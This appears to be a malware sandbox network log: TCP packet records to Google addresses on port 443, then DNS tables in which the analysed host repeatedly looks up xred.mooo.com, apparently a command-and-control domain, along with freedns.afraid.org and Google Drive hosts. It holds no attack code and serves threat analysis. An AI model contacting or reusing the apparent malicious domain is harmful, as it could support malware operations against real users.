                                                                                                                                                        Dec 30, 2024 11:48:50.462937117 CET44350189142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:50.463119984 CET50189443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:50.463135958 CET44350189142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:50.556658983 CET44350190142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:50.556714058 CET50190443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:50.557341099 CET50190443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:50.557352066 CET44350190142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:50.557836056 CET50190443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:50.557841063 CET44350190142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:50.768881083 CET44350187142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:50.769004107 CET50187443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:50.769098043 CET50187443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:50.769135952 CET44350187142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.897470951 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.897600889 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:52.897910118 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:52.897922039 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.964267969 CET44350199142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.964323997 CET44350199142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.964344025 CET50199443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.964355946 CET44350199142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.964427948 CET50199443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.964427948 CET50199443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.964436054 CET44350199142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.964454889 CET44350199142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.964520931 CET50199443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.964521885 CET50199443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.973088980 CET50199443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.973108053 CET44350199142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.973637104 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.973675966 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:52.973732948 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.974545956 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:52.974558115 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.444289923 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.444353104 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.444775105 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.444781065 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.446897984 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.446904898 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.506454945 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.506522894 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.507240057 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.507319927 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.510020018 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.510081053 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.510534048 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.510540009 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.510797977 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.510849953 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.511610031 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.511683941 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.512538910 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.512819052 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.512824059 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.513348103 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.513400078 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.513851881 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.559325933 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.559333086 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.592817068 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.593099117 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.604806900 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.604820967 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.605181932 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.605186939 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.848187923 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.848236084 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.848264933 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.848292112 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.848316908 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.848360062 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.848366976 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.848376036 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.848493099 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.849308014 CET50202443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.849323034 CET44350202142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.874105930 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.874253035 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.874269962 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.874392033 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.874610901 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.874650002 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.874829054 CET44350203142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.874897957 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.874898911 CET50203443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.875255108 CET50207443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.875298023 CET50208443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.875298977 CET44350207142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.875336885 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.875403881 CET50207443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.875417948 CET50208443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.878981113 CET50207443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:53.878987074 CET50208443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.878999949 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.879004955 CET44350207142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.880886078 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.880980968 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.881098032 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.881136894 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.881273031 CET44350204142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.881274939 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.881369114 CET50204443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.881778955 CET50209443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.881814957 CET44350209142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.882000923 CET50209443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.882803917 CET50209443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:53.882817984 CET44350209142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.011111021 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.011152029 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.011256933 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.011301041 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.011324883 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.012084007 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.012279034 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.017590046 CET50205443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.017613888 CET44350205142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.018454075 CET50210443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.018496037 CET44350210142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.018574953 CET50210443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.019298077 CET50210443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.019309998 CET44350210142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.486557961 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.487354040 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.487370968 CET50208443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:54.487396002 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.491380930 CET50208443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:54.506323099 CET44350207142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.507729053 CET44350209142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.507819891 CET50207443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:54.508991003 CET44350209142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.509038925 CET50209443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:54.509064913 CET44350209142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.509098053 CET50209443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:54.515350103 CET50209443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:54.611358881 CET50208443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:54.611381054 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:54.611780882 CET44350208142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.464961052 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.466756105 CET50219443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.466761112 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.473156929 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.473233938 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.475966930 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.476051092 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.479803085 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.479809046 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.480211973 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.480536938 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.481038094 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.527333975 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.540363073 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.540466070 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.541129112 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.541172981 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.543977976 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.544063091 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.560003042 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.560017109 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.560301065 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.560359001 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.560627937 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.560646057 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.560795069 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.560800076 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.563544035 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.611375093 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.839680910 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.839915037 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.840300083 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.840362072 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.840388060 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.840490103 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.841511011 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.841511011 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.841522932 CET44350220142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.845331907 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.845346928 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.845375061 CET50220443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.845484972 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.848779917 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.848788977 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.866746902 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.866810083 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.866839886 CET50219443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.866847038 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.866874933 CET50219443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.866909027 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.867140055 CET50219443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.867871046 CET50219443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.867876053 CET44350219142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.868985891 CET50225443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.869024038 CET44350225142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.870119095 CET50225443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.870975971 CET50225443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:57.870989084 CET44350225142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.919428110 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.919490099 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.919996023 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.920044899 CET44350222142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.920162916 CET50222443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.920876980 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.920886993 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:57.921019077 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.921534061 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:57.921555996 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.017807007 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.017865896 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.017896891 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.017914057 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.017925978 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.017987967 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.018013954 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.018049002 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.018776894 CET50221443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.018790960 CET44350221142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.019232035 CET50227443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.019263029 CET44350227142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.019387007 CET50227443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.021334887 CET50227443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.021344900 CET44350227142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.468034983 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.468195915 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.469124079 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.469192982 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.470731974 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.470737934 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.471064091 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.471539021 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.471539021 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.489268064 CET44350225142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.489355087 CET50225443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.489815950 CET50225443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.489828110 CET44350225142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.490118980 CET50225443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.490124941 CET44350225142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.515332937 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.524631023 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.524842978 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.525402069 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.525496006 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.527901888 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.527908087 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.528146029 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.528230906 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.528671026 CET50226443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.571338892 CET44350226142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.639698982 CET44350227142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.639976978 CET50227443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.651791096 CET50227443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.651791096 CET50227443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:58.651812077 CET44350227142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.651823044 CET44350227142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.836627007 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.836704016 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.836724043 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.836779118 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.836894035 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.836914062 CET44350224142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:58.836925030 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.836966038 CET50224443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.838095903 CET50228443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:58.838148117 CET44350228142.250.185.78192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:47:40.084043980 CET | 192.168.2.7 | 1.1.1.1 | 0x4ac7 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:04.901699066 CET | 192.168.2.7 | 1.1.1.1 | 0xaf2d | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:05.613075972 CET | 192.168.2.7 | 1.1.1.1 | 0x6bde | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:05.646159887 CET | 192.168.2.7 | 1.1.1.1 | 0x1e1 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:05.974272966 CET | 192.168.2.7 | 1.1.1.1 | 0xffac | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:09.905668020 CET | 192.168.2.7 | 1.1.1.1 | 0x9a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:15.606206894 CET | 192.168.2.7 | 1.1.1.1 | 0xddb6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:20.136296034 CET | 192.168.2.7 | 1.1.1.1 | 0xad35 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:26.096601963 CET | 192.168.2.7 | 1.1.1.1 | 0x585e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:32.997709990 CET | 192.168.2.7 | 1.1.1.1 | 0xd2ee | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:37.921677113 CET | 192.168.2.7 | 1.1.1.1 | 0x4ad7 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:43.575273991 CET | 192.168.2.7 | 1.1.1.1 | 0xe42f | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:48.091444016 CET | 192.168.2.7 | 1.1.1.1 | 0x22b2 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:53.763044119 CET | 192.168.2.7 | 1.1.1.1 | 0x8fb3 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:47:40.090697050 CET | 1.1.1.1 | 192.168.2.7 | 0x4ac7 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:47:40.090697050 CET | 1.1.1.1 | 192.168.2.7 | 0x4ac7 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:47:40.090697050 CET | 1.1.1.1 | 192.168.2.7 | 0x4ac7 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:47:40.090697050 CET | 1.1.1.1 | 192.168.2.7 | 0x4ac7 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:04.908507109 CET | 1.1.1.1 | 192.168.2.7 | 0xaf2d | No error (0) | docs.google.com | | 142.250.185.78 | A (IP address) | IN (0x0001) | false
